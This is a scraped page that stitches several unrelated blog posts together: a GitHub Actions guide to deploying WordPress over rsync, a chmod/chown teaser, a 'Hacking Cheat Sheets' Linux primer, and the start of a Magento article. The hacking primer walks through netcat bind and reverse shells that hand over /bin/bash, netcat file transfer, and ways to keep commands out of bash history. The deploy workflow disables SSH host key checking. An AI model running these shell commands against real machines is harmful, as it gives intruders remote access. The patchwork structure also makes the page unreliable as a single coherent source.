There are a lot of really useful commands available. I simply could not list them all out here without doing them a disservice. I would add to this list a number of very important utilities like df, free, nc, lsof, and loads of other diagnostic commands. Not to mention, many of these commands actually deserve their own post! I plan on writing more of these in the coming weeks. Thanks! If you have suggestions, please feel free to leave a comment below!

Continuous Deployments for WordPress Using GitHub Actions

Continuous Integration (CI) workflows are considered a best practice these days. As in, you work with your version control system (Git), and as you do, CI is doing work for you like running tests, sending notifications, and deploying code. That last part is called Continuous Deployment (CD). But shipping code to a production server often requires paid services. With GitHub Actions, Continuous Deployment is free for everyone. Let’s explore how to set that up.

DevOps is for everyone

As a front-end developer, I used to find continuous deployment workflows exciting, but mysterious. I remember numerous times being scared to touch deployment configurations. I defaulted to the easy route instead: usually having someone else set it up and maintain it, or, in a worst-case scenario, manually copying and pasting things.

As soon as I understood the basics of rsync, CD finally became tangible to me. With the following GitHub Action workflow, you do not need to be a DevOps specialist; but you’ll still have the tools at hand to set up best practice deployment workflows.

The basics of a Continuous Deployment workflow

So what’s the deal, how does this work? It all starts with CI, which means that you commit code to a shared remote repository, like GitHub, and every push to it will run automated tasks on a remote server. Those tasks could include test and build processes, like linting, concatenation, minification and image optimization, among others.

CD also delivers code to a production website server. That may happen by copying the verified and built code and placing it on the server via FTP, SSH, or by shipping containers to an infrastructure. While every shared hosting package has FTP access, it’s rather unreliable and slow to send many files to a server. And while shipping application containers is a safe way to release complex applications, the infrastructure and setup can be rather complex as well. Deploying code via SSH though is fast, safe and flexible. Plus, it’s supported by many hosting packages.

How to deploy with rsync

An easy and efficient way to ship files to a server via SSH is rsync, a utility tool to sync files between a source and destination folder, drive or computer. It will only synchronize those files which have changed or don’t already exist at the destination. As it became a standard tool on popular Linux distributions, chances are high you don’t even need to install it.

The most basic operation is as easy as calling rsync SRC DEST to sync files from one directory to another one. However, there are a couple of options you want to consider:

-c compares file changes by checksum, not modification time

-h outputs numbers in a more human readable format

-a retains file attributes and permissions and recursively copies files and directories

-v shows status output

--delete deletes files from the destination that aren’t found in the source (anymore)

--exclude prevents syncing specified files like the .git directory and node_modules

And finally, you want to send the files to a remote server, which makes the full command look like this:

rsync -chav --delete --exclude /.git/ --exclude /node_modules/ ./ [email protected]:/mydir

You could run that command from your local computer to deploy to any live server. But how cool would it be if it was running in a controlled environment from a clean state? Right, that’s what you’re here for. Let’s move on with that.

Create a GitHub Actions workflow

With GitHub Actions you can configure workflows to run on any GitHub event. While there is a marketplace for GitHub Actions, we don’t need any of them but will build our own workflow.

To get started, go to the “Actions” tab of your repository and click “Set up a workflow yourself.” This will open the workflow editor with a .yaml template that will be committed to the .github/workflows directory of your repository.

When saved, the workflow checks out your repo code and runs some echo commands. name helps follow the status and results later. run contains the shell commands you want to run in each step.

Define a deployment trigger

Theoretically, every commit to the master branch should be production-ready. However, reality teaches you that you need to test results on the production server after deployment as well and you need to schedule that. We at bleech consider it a best practice to only deploy on workdays — except Fridays and only before 4:00 pm — to make sure we have time to roll back or fix issues during business hours if anything goes wrong.

An easy way to get manual-level control is to set up a branch just for triggering deployments. That way, you can specifically merge your master branch into it whenever you are ready. Call that branch production, let everyone on your team know pushes to that branch are only allowed from the master branch and tell them to do it like this:

git push origin master:production
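You can see what the `master:production` refspec does without touching a real repository. This sketch uses a local bare repository as a stand-in for GitHub, and the paths, file name and commit identity are placeholders. The refspec means "push my local master to the remote branch production", creating that branch if needed. If production ever contains commits that master lacks, git rejects the push as a non-fast-forward.

```shell
#!/usr/bin/env bash
# A local bare repository plays the role of GitHub; all paths and the identity are placeholders.
gitdemo=$(mktemp -d)
git init -q --bare "$gitdemo/origin.git"
git init -q "$gitdemo/app"
git -C "$gitdemo/app" symbolic-ref HEAD refs/heads/master    # name the first branch "master"

echo "<?php // theme" > "$gitdemo/app/functions.php"
git -C "$gitdemo/app" add functions.php
git -C "$gitdemo/app" -c user.name="Demo" -c user.email="demo@example.com" commit -q -m "Initial theme"
git -C "$gitdemo/app" remote add origin "$gitdemo/origin.git"

git -C "$gitdemo/app" push -q origin master               # publish master as usual
git -C "$gitdemo/app" push -q origin master:production    # <local branch>:<remote branch>

# Both remote branches now point at the same commit.
git --git-dir="$gitdemo/origin.git" show-ref --heads
```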

Here’s how to change your workflow trigger to only run on pushes to that production branch:

name: Deployment

on:
  push:
    branches: [ production ]

Build and verify the theme

I’ll assume you’re using Flynt, our WordPress starter theme, which comes with dependency management via Composer and npm as well as a preconfigured build process. If you’re using a different theme, the build process is likely to be similar, but might need adjustments. And if you’re checking in the built assets to your repository, you can skip all steps except the checkout command.

For our example, let’s make sure that node is executed in the required version and that dependencies are installed before building:

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-node@v1
        with:
          node-version: 12.x
      - name: Install dependencies
        run: |
          composer install -o
          npm install
      - name: Build
        run: npm run build

The Flynt build task finally requires, lints, compiles, and transpiles Sass and JavaScript files, then adds revisioning to assets to prevent browser cache issues. If anything in the build step fails, the workflow will stop executing and thus prevents you from deploying a broken release.

Configure server access and destination

For the rsync command to run successfully, GitHub needs access to SSH into your server. This can be accomplished by:

Generating a new SSH key (without a passphrase)

Adding the public key to your ~/.ssh/authorized_keys on the production server

Adding the private key as a secret with the name DEPLOY_KEY to the repository
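On your own machine, the first of these steps could look like the sketch below. It assumes OpenSSH's ssh-keygen is available. The key file name and comment are arbitrary choices, and user@example.org is a placeholder host.

```shell
#!/usr/bin/env bash
# Generate an Ed25519 key pair without a passphrase (-N "") for the deployment.
keydir=$(mktemp -d)
ssh-keygen -q -t ed25519 -N "" -C "github-actions-deploy" -f "$keydir/deploy_key"

# Public half: append this line to ~/.ssh/authorized_keys on the production server,
# for example with: ssh-copy-id -i "$keydir/deploy_key.pub" user@example.org
cat "$keydir/deploy_key.pub"

# Private half: paste the full contents of this file into a repository secret
# named DEPLOY_KEY in the repository settings, then delete the local copy.
echo "private key written to $keydir/deploy_key"
```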

The sync workflow step needs to save the key to a local file, adjust file permissions and pass the file to the rsync command. The destination has to point to your WordPress theme directory on the production server. It’s convenient to define it as a variable so you know what to change when reusing the workflow for future projects.

- name: Sync
  env:
    dest: 'user@example.org:/mydir/wp-content/themes/mytheme'
  run: |
    echo "${{ secrets.DEPLOY_KEY }}" > deploy_key
    chmod 600 ./deploy_key
    rsync -chav --delete \
      -e 'ssh -i ./deploy_key -o StrictHostKeyChecking=no' \
      --exclude /.git/ \
      --exclude /.github/ \
      --exclude /node_modules/ \
      ./ ${{ env.dest }}

Depending on your project structure, you might want to deploy plugins and other theme related files as well. To accomplish that, change the source and destination to the desired parent directory, make sure to check if the excluded files need an update, and check if any paths in the build process should be adjusted.

Put the pieces together

We’ve covered all necessary steps of the CD process. Now we need to run them in a sequence which should:

Trigger on each push to the production branch

Install dependencies

Build and verify the code

Send the result to a server via rsync

The complete GitHub workflow will look like this:

name: Deployment

on:
  push:
    branches: [ production ]

jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - uses: actions/setup-node@v1
        with:
          node-version: 12.x
      - name: Install dependencies
        run: |
          composer install -o
          npm install
      - name: Build
        run: npm run build
      - name: Sync
        env:
          dest: 'user@example.org:/mydir/wp-content/themes/mytheme'
        run: |
          echo "${{ secrets.DEPLOY_KEY }}" > deploy_key
          chmod 600 ./deploy_key
          rsync -chav --delete \
            -e 'ssh -i ./deploy_key -o StrictHostKeyChecking=no' \
            --exclude /.git/ \
            --exclude /.github/ \
            --exclude /node_modules/ \
            ./ ${{ env.dest }}

To test the workflow, commit the changes, pull them into your local repository and trigger the deployment by pushing your master branch to the production branch:

git push origin master:production

You can follow the status of the execution by going to the “Actions” tab in GitHub, selecting the most recent run and clicking the “deploy” job. Green checkmarks indicate that everything went smoothly. If there are any issues, check the logs of the failed step to fix them.

Check the full report on GitHub

Congratulations! You’ve successfully deployed your WordPress theme to a server. The workflow file can easily be reused for future projects, making continuous deployment setups a breeze.

To further refine your deployment process, the following topics are worth considering:

Caching dependencies to speed up the GitHub workflow

Activating the WordPress maintenance mode while syncing files

Clearing the website cache of a plugin (like Cache Enabler) after the deployment

The post Continuous Deployments for WordPress Using GitHub Actions appeared first on CSS-Tricks.

Continuous Deployments for WordPress Using GitHub Actions published first on https://deskbysnafu.tumblr.com/


CHMOD and CHOWN- Must Know Linux Commands


This tutorial explains CHMOD and CHOWN commands that are broadly used in Linux.

CHMOD and CHOWN

The command chmod stands for "change mode" and is used to change the permissions of a file or directory. The command chown stands for "change owner" and is used to change the ownership of a file or directory.


Let us…
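The teaser stops before any examples, so here is a minimal sketch of both commands on a throwaway directory tree. It includes the common case of recursively applying one mode to directories and another to files. The directory names are hypothetical.

```shell
#!/usr/bin/env bash
# Throwaway tree with hypothetical names, deliberately left wide open.
site=$(mktemp -d)
mkdir -p "$site/wp-content/themes/mytheme"
touch "$site/index.php" "$site/wp-content/themes/mytheme/style.css"
chmod -R 777 "$site"

# chmod -R applies one mode to everything, so split by type with find:
# directories need x to be entered, regular files usually don't need it.
find "$site" -type d -exec chmod 755 {} +
find "$site" -type f -exec chmod 644 {} +

# A symbolic one-liner for trees where no file is executable yet:
# capital X grants execute only on directories (and on files that already have an x bit).
#   chmod -R u=rwX,go=rX "$site"

# chown sets owner[:group]. Giving files to another user normally requires root,
# but setting your own user and primary group on files you own is allowed.
chown -R "$(id -u):$(id -g)" "$site"

ls -lR "$site"
```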


Hacking Cheat Sheets Part 3: Linux

Here is a little primer on some basic Linux, which is important for hacking.

Linux Operating System

Linux File System

/: root of the file system
/var: variable data; log files are found here
/bin: binaries, commands for users
/sbin: system binaries, commands for administration
/root: home directory for the root user
/home: home folders for all non-privileged users
/boot: the Linux kernel image and other boot files
/proc: direct access to the Linux kernel and process information
/dev: device files for direct access to hardware such as storage devices
/mnt: a place to mount devices into the file system

Identifying Users and Processes

init: process ID 1
root: UID and GID 0
service accounts: UIDs 1-999
all other users: UID 1000 and above
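You can check the UID ranges above against /etc/passwd. This is a minimal sketch that assumes the Debian-style cut-off at 1000 listed above. Other distributions may differ, and UID_MIN in /etc/login.defs is the authoritative value. `classify_accounts` is a hypothetical function name. Note that the nobody account (UID 65534 on Debian) lands in the last bucket.

```shell
#!/usr/bin/env bash
# Print "name uid kind" for every account in a passwd-format file (default /etc/passwd),
# using the ranges above: 0 = root, 1-999 = service accounts, 1000+ = regular users.
classify_accounts() {
  awk -F: '{
    if ($3 == 0)        kind = "root"
    else if ($3 < 1000) kind = "service"
    else                kind = "user"
    print $1, $3, kind
  }' "${1:-/etc/passwd}"
}

classify_accounts | head -n 5
```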

In the protection-ring security model, ring 0 is where the kernel runs. Rings 1 and 2 are intended for device drivers, although Linux doesn't use them: its drivers run in ring 0 with the kernel. Ring 3 is user space, where init and ordinary applications run.

init executes scripts to set up all non-OS services and structures for the user environment. It also checks and mounts the file systems, spawns the GUI if it's configured to do so, and then presents the user with the login screen. init scripts are usually located in /etc/rc..../

* </> is the root directory, where the Linux file system begins; every other directory is underneath it. Don't confuse it with the root account or the root account's home directory.

* </etc> holds the configuration files for the Linux system. Most are text files and can be edited.

* </bin> and </usr/bin> contain most of the system's binaries. /bin holds the most important programs (shells, ls, grep), and /usr/bin holds other applications for users.

* </sbin> and </usr/sbin> hold most system administration programs.

* </usr> contains most user applications, their source code, pictures, docs and other config files. /usr is usually the largest directory on a Linux system.

* </lib> stores the shared libraries (shared objects) for dynamically linked programs.

* </boot> stores boot information, including the Linux kernel itself (the vmlinuz file).

* </home> holds the users' home directories. Every user has a directory under /home, and that's usually where they store all their files.

* </root> is the superuser's (root's) home directory.

* </var> contains variable data that changes frequently while the system is running, including logs (/var/log), mail (/var/mail) and print spool data (/var/spool).

* </tmp> is scratch space for temporary files.

* </dev> contains the device files for the system. Devices are treated like files in Linux, and for the most part you can read from and write to them just like files.

* </mnt> is used for mount points. Hard drives, USB drives and CD-ROMs must be mounted on some directory in the file system tree before they can be used. Debian sometimes uses /cdrom instead of /mnt.

* </proc> is a special and interesting directory. It's a virtual file system: its contents aren't stored on disk but are generated by the kernel on the fly. It contains information about the kernel and all processes, plus special files that give access to the system's current configuration.

File permissions are specified for three classes: 1. the file's owner (user), 2. the members of the file's group (group), and 3. everyone else (other).

* The she-bang is #!. It goes at the very beginning of a shell script, followed by the path to the interpreter that should run the script: #!/bin/bash for bash, or #!/bin/sh for the system's POSIX shell.
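A two-line script is enough to see the she-bang at work. This is only a sketch: greet.sh is a hypothetical file name, and the script goes in a temporary directory, which must not be mounted noexec.

```shell
#!/usr/bin/env bash
# Write a script whose first line is a she-bang, make it executable and run it.
script_dir=$(mktemp -d)
cat > "$script_dir/greet.sh" <<'EOF'
#!/bin/bash
echo "hello, ${1:-world}"
EOF
chmod +x "$script_dir/greet.sh"   # without the execute bit, running it directly fails with "Permission denied"
"$script_dir/greet.sh" ray        # the kernel reads "#!/bin/bash" and starts bash with the script
```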

• ls lists what's in the current directory; ls -la also shows hidden files.
• When using cd to change directories, remember there are two kinds of path: absolute and relative. An absolute path starts from the root directory, so to change to the desktop from anywhere you type the full path: cd /root/Desktop. A relative path starts from your current location, so if you are already in /root you can just type cd Desktop (paths are case sensitive). The command cd .. takes you one level up in the filesystem.
• Man pages: to learn more about the ls command, type man ls to open its manual page. Press q to quit.
• Adding a user: by default the Kali login is a privileged account, because many tools require root to run. You should add an unprivileged account for everyday use. adduser ray adds the user (the first regular account usually gets UID and GID 1000) and creates a home directory at /home/ray. It then asks for a password twice, followed by optional details such as full name and work phone number. To let the new user run commands as root when needed, add it to the sudo group with adduser ray sudo. To switch to the regular user, type su ray. To check that it's unprivileged, try adduser smojoe: it fails, often with "command not found", because /usr/sbin isn't in a regular user's PATH. Now try sudo adduser smojoe, enter your password, and the user is added. To switch back to root, type su and enter the root password, which by default is toor. To change the root password, type passwd and enter the new password twice.
• Creating a new file: to make a new empty file, type touch raysfile.
• Making a new directory: mkdir raysdirectory
• Copying, moving and removing files: to copy a file, use cp with the syntax cp source destination, for example cp /root/raysfile raysfile2.
Moving works the same way as copying, except you use mv: mv /root/raysfile2 /root/raysdirectory. To remove a file, type rm raysfile2. (Side note: rm -r removes a directory and everything in it recursively, and -f skips all confirmation, so rm -rf on the wrong path can wipe out far more than you intended.)
• Adding text to a file: echo by itself just repeats what you type, so echo im captain awesome prints that phrase back to you in the terminal. To put it in a file, use the > redirect: echo im captain awesome > raysfile. To see the contents, type cat raysfile. If you now type echo im captain awesome again > raysfile and cat the file, you'll notice it overwrote what was there before. To append instead, use >>: echo im captain awesome a third time >> raysfile. Cat the file again and you'll see the new text on its own line.
• File permissions: to see what permissions a file has, type ls -l raysfile. From left to right, the output shows the file type (the leading character), the permissions (-rw-r--r--), the number of links to the file (1), the user and group that own the file (root root), the file size in bytes, the time the file was last modified, and finally the file name (raysfile). Linux has three permissions: read (r), write (w) and execute (x), set separately for three classes: the owner, the group and all other users. The first three permission characters are for the owner, the next three for the group and the last three for everyone else. So -rw-r--r-- means the owner can read and write, while the group and all other users can only read. Because the file was created while logged in as root, the owner and group are both root. To change permissions, use the chmod command; in numeric notation each class gets a digit from 0 to 7.
The digits are:
  o 7: read, write and execute (111 in binary)
  o 6: read and write (110)
  o 5: read and execute (101)
  o 4: read only (100)
  o 3: write and execute (011)
  o 2: write only (010)
  o 1: execute only (001)
  o 0: none (000)
• chmod: to give the owner read, write and execute, and give the group and everyone else no permissions, type chmod 700 raysfile. This works because each digit is three bits in the order rwx: 7 is 111 (rwx) for the owner, and 0 is 000 (---) for the group and for others. The leading - in the ls -l output means it's a regular file; a d there would indicate a directory.
• You can also use symbolic notation, where u = user (owner), g = group, o = others (world) and a = all. For example, if the file is already rwx------ and you type chmod g+w raysfile, it becomes rwx-w----: you added (+) write permission for the group. chmod a+x raysfile then gives rwx-wx--x, meaning the owner, group and world can all execute it. chmod a-x raysfile removes execute from everyone, leaving rw--w----.
• Editing files: you won't always have a GUI text editor, especially when you break into a Linux box and get a shell, so you need to know terminal editors like nano and vi. To create a new file and edit it at the same time, type nano testfile.txt. Once it opens, start typing (for example, chuck Norris knows victorias secret), and when you're done press Ctrl-X. nano asks whether to save, so type Y and press Enter. Open the file again with nano testfile.txt and search for the word chuck: press Ctrl-W, type chuck and press Enter, and the cursor jumps to the c in chuck. Press Ctrl-X, then Y and Enter to save. Now try the vi editor: type vi testfile.txt.
vi starts in command mode, so you can't enter text yet: press i (lowercase) to switch to insert mode and start adding text. When you're done, press Escape to return to command mode. There you can delete text with d followed by a movement. For example, in the word test with the cursor over the "e", pressing d and then the right arrow deletes the "e", leaving "tst" with the cursor on the "s". Pressing d and then the left arrow deletes the character to the left of the cursor, so the "t" goes and the "s" stays. Kinda weird stuff; I prefer nano. With the cursor on a line, dd deletes the whole line. To write the changes and exit vi, type :wq (w for write, q for quit). The man pages cover these editors in more depth.
• Data manipulation: create a file called raystest (touch raystest, then open it in an editor) containing these three lines:
  1 warrior favorite
  2 300 favorite2
  3 braveheart favorite3
• Grep: to find all lines containing a word, type grep favorite raystest. This outputs all three lines. grep warrior raystest outputs only the line containing warrior; notice that grep prints the whole matching line, not just the word. To pull a single word out of that line, pipe the result into cut: grep warrior raystest | cut -d " " -f 2. Here -d sets the delimiter (the space between the words in 1 warrior favorite) and -f selects the field, in this case the second column. In other words, grep keeps the lines that contain warrior, and cut prints the second space-separated field of each of them, which is warrior. If you rerun the command with -f 3 instead of -f 2, it prints favorite, because that's what is in the third column of the matching line.
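Here is the grep and cut walkthrough above as a runnable sketch. It writes the three raystest lines to a temporary file, which stands in for the raystest you created by hand.

```shell
#!/usr/bin/env bash
# Recreate the three-line raystest file in a scratch location.
raystest=$(mktemp)
printf '%s\n' "1 warrior favorite" "2 300 favorite2" "3 braveheart favorite3" > "$raystest"

grep favorite "$raystest"                    # all three lines contain "favorite"
grep warrior "$raystest"                     # only "1 warrior favorite"
grep warrior "$raystest" | cut -d " " -f 2   # second space-separated field: warrior
grep warrior "$raystest" | cut -d " " -f 3   # third field of the same line: favorite
```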
• Sed: sed manipulates text based on patterns and expressions, which is handy when you need to replace every instance of a word in a long file. In its s (substitute) command, / is the delimiter, so to replace favorite with awesome type: sed 's/favorite/awesome/' raystest. The output shows awesome, awesome2 and awesome3 instead. sed prints the result and leaves the file unchanged unless you add -i, and without a trailing g flag (s/favorite/awesome/g) it replaces only the first match on each line.
• Awk: awk does pattern matching on columns. To find the entries whose first column is greater than 1, type awk '$1 > 1' raystest; this outputs the second and third lines of the file. To print only "1 warrior", "2 300" and "3 braveheart", omitting the favorite words, type awk '{print $1, $2}' raystest, which prints just the first and second columns.
• Starting services: on a fresh install of Kali Linux, postgresql and metasploit are not started by default. To start a service, type service postgresql start (or service apache2 start, and so on). To make them start at boot, use update-rc.d: type update-rc.d postgresql enable and then update-rc.d metasploit enable, and when you restart Kali these services start automatically.
• Setting up networking in Kali: ifconfig lists much the same information as ipconfig does on Windows, and route shows the routing table, including your default gateway. To set a static address on the fly, find your Ethernet interface name and type ifconfig eth0 10.0.0.20/24, which assigns the address with a /24 (class C-sized, 255.255.255.0) netmask. To make the static address persist across restarts, edit /etc/network/interfaces (I opened it in leafpad). Leave the auto lo and iface lo inet loopback lines alone; they configure the loopback interface.
Then comment out the next section (probably the DHCP settings) and add the following right below it:
auto eth0
iface eth0 inet static
    address 10.0.0.20
    netmask 255.255.255.0
    gateway 10.0.0.4

Once that's done, save the file and restart networking with: service networking restart
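You can replay the sed and awk bullets from this cheat sheet on a scratch copy of the three-line raystest file. This is a minimal sketch: the temporary file stands in for raystest, and the in-place edit at the end uses GNU sed's -i (BSD/macOS sed expects -i '' instead).

```shell
#!/usr/bin/env bash
sample=$(mktemp)
printf '%s\n' "1 warrior favorite" "2 300 favorite2" "3 braveheart favorite3" > "$sample"

sed 's/favorite/awesome/' "$sample"      # prints the edited text; the file itself is unchanged
awk '$1 > 1' "$sample"                   # lines whose first column is greater than 1
awk '{print $1, $2}' "$sample"           # first two columns only
sed -i 's/favorite/awesome/' "$sample"   # GNU sed: -i rewrites the file in place
cat "$sample"
```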

• To view network connections such as listening ports, type: netstat -antp
• Netcat: it's called the Swiss Army knife for hackers, so let's do some exercises with it. Start by looking at the help: nc -h
1. Check whether a port is listening: first start the apache2 service, then type nc -v <the address of your kali machine> 80
2. Since apache is running, you should see that the port is open.
3. You can also set up a listener: nc -lvp 1234
4. Here -l means listen, -v means verbose, and -p specifies the port to listen on.
5. Open a second terminal window and use netcat to connect to the listener.
6. In the second terminal type nc 10.0.0.100 1234 and press Enter.
7. The first terminal should show that a client connected.
8. Now chat from the second terminal: type sup and press Enter.
9. The word "sup" should appear in the first terminal.
10. Type something in the first terminal and it should appear in the second.
11. Press Ctrl-C. (You could also demo this between Metasploitable 2 and Kali.)
12. Now let's make the listener (victim) give the second terminal (attacker) a bash shell when it connects.
13. In the first terminal type nc -lvp 1234 -e /bin/bash. The -e option runs the given program and hands it the connection; only some netcat versions, such as netcat-traditional, support it.
14. In the second terminal type nc 10.0.0.100 1234 and press Enter.
15. Nothing is displayed, but give it a second (you may have to press Enter in the first terminal to get it to register the connection), then type whoami in the second terminal; it should print root.
16. Type id and you should see the uid, gid and groups all showing root (0).
17. Press Ctrl-C.
18. Besides offering a shell from the listener, you can also push a shell back to the listener.
19. In the first terminal type nc -lvp 1234
20. In the second terminal type nc 10.0.0.100 1234 -e /bin/bash (if doing this from Windows 7, replace /bin/bash with cmd.exe).
21. Back in the first terminal type whoami and you should see root.
22. Press Ctrl-C.
23. Now let's send a file with netcat.
24. In the first terminal type nc -lvp 1234 > netcatfile (the listener writes whatever it receives into this file).
25. In the second terminal type nc 10.0.0.100 1234 < raystest (the file from the previous exercises).
26. Press Ctrl-C, then in the first terminal type cat netcatfile. It should contain the same text as raystest (1 warrior favorite, etc).

* If I type history in bash, it shows the commands I recently typed. That's handy for rerunning commands, but bad if an attacker gets hold of it, because it also contains any passwords I typed on the command line. For example, wget --user ray --password lamepassword http://somesite.com gets logged in the bash history. Instead, store the password in a variable with the read command: read -e -s -p "pass?" password. Pressing Enter shows the prompt pass?, where you type your password (it isn't displayed as you type). The options: -e uses readline to get the line when input comes from a terminal, -s is silent mode (characters typed at a terminal are not echoed), and -p displays the prompt, but only when input comes from a terminal. echo $password shows the password you just typed. Now the wget command looks like this: wget --user ray --password "$password" http://somesite.com. Run history again and you'll see the plain-text password isn't there.
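The read trick can be wrapped in a small helper. This is a minimal sketch: `read_secret` is a hypothetical name, and the wget line is the example from above, left as a comment so nothing is downloaded. wget also has its own --ask-password option, which prompts for the password itself and keeps it off the command line entirely.

```shell
#!/usr/bin/env bash
# Read a secret into the variable named by $1 without echoing it.
# -r keeps backslashes literal, -s turns off echo, and -p shows the prompt
# (bash only displays the prompt when input comes from a terminal).
read_secret() {
  IFS= read -r -s -p "pass? " "$1"
  echo >&2   # the Enter key isn't echoed either, so move to a fresh line
}

# Usage (interactive):
#   read_secret password
#   wget --user ray --password "$password" http://somesite.com
#   unset password   # drop the variable once you no longer need it
```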

* export HISTCONTROL=ignorespace keeps some commands out of the bash history: once it's set, any command you start with a space is not recorded.

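* You can also do export HISTIGNORE="pass*:wget*:ls*", and history will ignore commands beginning with pass, wget or ls. Each colon-separated pattern must match the whole command line, so a plain ls entry would skip only a bare ls, not ls -la.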

* If I type password=1234 and then echo $password, it echoes 1234. But if I run unset password, the variable is removed, and echo $password prints nothing.

* To delete an entry from history, type history -d followed by the entry's number. For example, history -d 15 deletes the 15th history entry.

Keyboard shortcuts: if I'm at the end of a line, the Home key takes me back to the beginning, and the End key takes me back to the end. Ctrl+U clears everything before the cursor (the whole line if I'm at the end), instead of backspacing through it. Ctrl+L clears the screen.

lsof lists open files. To see all the details of a running Firefox instance, including its TCP connections and addresses, type lsof -i -n -P | grep firefox. The -i option selects files whose Internet address matches the address given after it; with no address, it lists all Internet (and, on HP-UX, X.25) network files. The -n option stops lsof from converting network numbers to host names, and -P stops it from converting port numbers to port names. Skipping those conversions can make lsof run faster, and it's also useful when host name or port name lookup isn't working properly.

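Try netstat -tupac for lots of information about your current connections: -t shows TCP, -u UDP, -p the owning program, -a all sockets including listening ones, and -c refreshes the output continuously.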

The df command shows the current free disk space, and the free command shows the current free memory.

pwd is print working directory

If I want to list the contents of both Documents and Pictures, I don't need two ls commands: ls Documents Pictures shows both. (This is on regular Ubuntu or a similar distro, not Backtrack.)

* ls -lt sorts the long listing by modification time, newest first.

* To find out what type of file I have, I type file followed by the file name. For example, file dateping.sh tells me it's a POSIX shell script.

* The less command lets me view a text file's contents in the terminal. Q quits.

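* Wildcards: to move every file whose name starts with the letters "up", type mv up* followed by the destination directory. To move anything that starts with "u", use mv u*, and to move anything that starts with "u" and has the extension .bin, use mv u*.bin (each followed by a destination). Note that [up]* would match names starting with either "u" or "p", because brackets match a single character from the set.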
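You can compare the wildcard patterns side by side in a scratch directory. The file names below are made up for the demonstration.

```shell
#!/usr/bin/env bash
# Scratch directory with a few hypothetical file names.
demo=$(mktemp -d)
touch "$demo"/{update.bin,upload.txt,unzip.bin,patch.txt,notes.txt}
mkdir "$demo/dest"

starts_up=( "$demo"/up* )      # update.bin upload.txt
u_or_p=( "$demo"/[up]* )       # [up] is ONE character, u or p: also unzip.bin and patch.txt
u_bins=( "$demo"/u*.bin )      # update.bin unzip.bin

printf '%s\n' "${starts_up[@]##*/}"   # print just the file names
mv "$demo"/u*.bin "$demo/dest"/       # mv needs a destination after the pattern
ls "$demo/dest"
```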

* File names are case sensitive (for example when moving and copying).

* Spaces in file names confuse bash as well, so wrap such names in quotes or escape each space with a backslash.

* two exclamation marks !! will run the last command

* The type command tells me what type of command I'm running. For instance, to see what type of command "type" is, I type type type, and it shows that it's a shell builtin.

* The which command tells me where a command's executable is found. For example, which ls shows that ls lives in /bin/ls. It only finds programs on disk, so which cd usually prints nothing, because cd is a shell builtin rather than an executable.

* help cd will tell me about the cd command

* mkdir --help will tell me help about mkdir

* man ls will give me the manual page for ls, I hit q to get out of it.

* apropos searches the man page names and descriptions for a keyword, like apropos passwd.

* whatis will also tell me what a command is, whatis ls

* info will give me verbose info about a command

* i can chain commands together on the same line using semicolons between each command. So if i wanted to change to a directory and also look at its contents, then send me back to my working directory: cd /usr; ls;cd - would do this for me

* Now say I want to make that last command an alias called foo: alias foo='cd /usr; ls; cd -'. Now I can just type foo and it runs. This won't persist when I close the terminal, though. To make it permanent, open ~/.bashrc (for example with gedit ~/.bashrc), put the alias in the section that has aliases, and save it. Then close the current terminal and reopen it (or run source ~/.bashrc), and the alias works. type foo shows the commands the alias strings together. You can copy your .bashrc file to other machines to carry your aliases across.

* unalias foo will take away that alias

* All the programs in the terminal produce some sort of output, whether a result or an error message. Results are sent to a stream called standard output (stdout), and error messages to a stream called standard error (stderr). By default neither is saved to disk; both go to the screen. Likewise, the keyboard is tied to standard input (stdin). We can change where the output goes and where the input comes from. For example, ls -l /usr/bin prints to the screen, but ls -l /usr/bin > ls-output.txt writes the listing to a text file. If I then type ls -l /bin/usr > ls-output.txt, I get an error because /bin/usr doesn't exist, and ls-output.txt ends up empty: the shell truncates the file before ls even runs, and the error message goes to stderr (the screen), not into the file. To append to an existing file instead of overwriting it, use >>: running ls -l /usr/bin >> ls-output.txt twice makes the file twice as long.
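You can reproduce the overwrite, append and error cases above in a scratch directory. This sketch also uses 2>, which sends standard error to its own file, so you can see that the error never lands in ls-output.txt.

```shell
#!/usr/bin/env bash
out=$(mktemp -d)

ls -l /usr/bin > "$out/ls-output.txt"      # stdout goes to the file (overwritten)
once=$(wc -l < "$out/ls-output.txt")
ls -l /usr/bin >> "$out/ls-output.txt"     # >> appends a second copy
twice=$(wc -l < "$out/ls-output.txt")

# /bin/usr doesn't exist: the shell truncates ls-output.txt before ls even runs,
# and the error message goes to stderr, which 2> sends to its own file.
ls -l /bin/usr > "$out/ls-output.txt" 2> "$out/ls-error.txt"

echo "lines after one listing: $once, after appending: $twice"
cat "$out/ls-error.txt"
```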

* cat displays a file's contents: cat ls-output.txt prints everything in that file to the console. It can also concatenate (join) files in sequence. For example, if I had movie.avi.001, movie.avi.002 and movie.avi.003 and wanted to join them, I would type cat movie.avi.0* > movie.avi. I can also use cat to create a new text file: type cat > newtext.txt and press Enter, and it waits for input. Type this is a test, press Enter, type of the broadcast network, and press Ctrl+D twice to get back to the prompt (a single Ctrl+D is enough at the start of an empty line). When I open the file, it contains the text exactly as I typed it.
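Splitting a file first gives you something to join back together, which makes the cat trick easy to verify. This sketch assumes GNU coreutils, since split's -d numeric-suffix option is GNU-specific. The random 5000-byte file merely stands in for a real video.

```shell
#!/usr/bin/env bash
parts=$(mktemp -d)
head -c 5000 /dev/urandom > "$parts/movie.avi"              # stand-in for a real video file
# GNU split: -b 2000 = 2000-byte pieces, -d -a 3 = numeric suffixes 000, 001, 002
split -b 2000 -d -a 3 "$parts/movie.avi" "$parts/movie.avi."
ls "$parts"
# The glob expands in sorted order, so cat joins the pieces back in sequence.
cat "$parts"/movie.avi.0* > "$parts/rejoined.avi"
cmp "$parts/movie.avi" "$parts/rejoined.avi" && echo "rejoined file is identical"
```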

* echo with a letter followed by an asterisk lists the files in the current directory that start with that letter: echo p* shows all the files here that start with p (case sensitive). echo [[:upper:]]* shows everything in this directory whose name starts with an uppercase letter.

* To find hidden files in the current directory, use ls -d .[!.]?* (you could also use ls -la).


MAGENTO MODULE: INSTALLING AND CREATING

In any discussion of e-commerce development, Magento is almost always near the top of the list of best platforms because of its robustness and wide range of features. Besides attractive themes, modules are another important element to consider when building your e-commerce site. You can either download existing Magento modules or create new ones for your needs. In this article, we will introduce the steps (and rules) for installing and creating Magento modules.

A. An overview of Magento module

1. What is a Magento module?

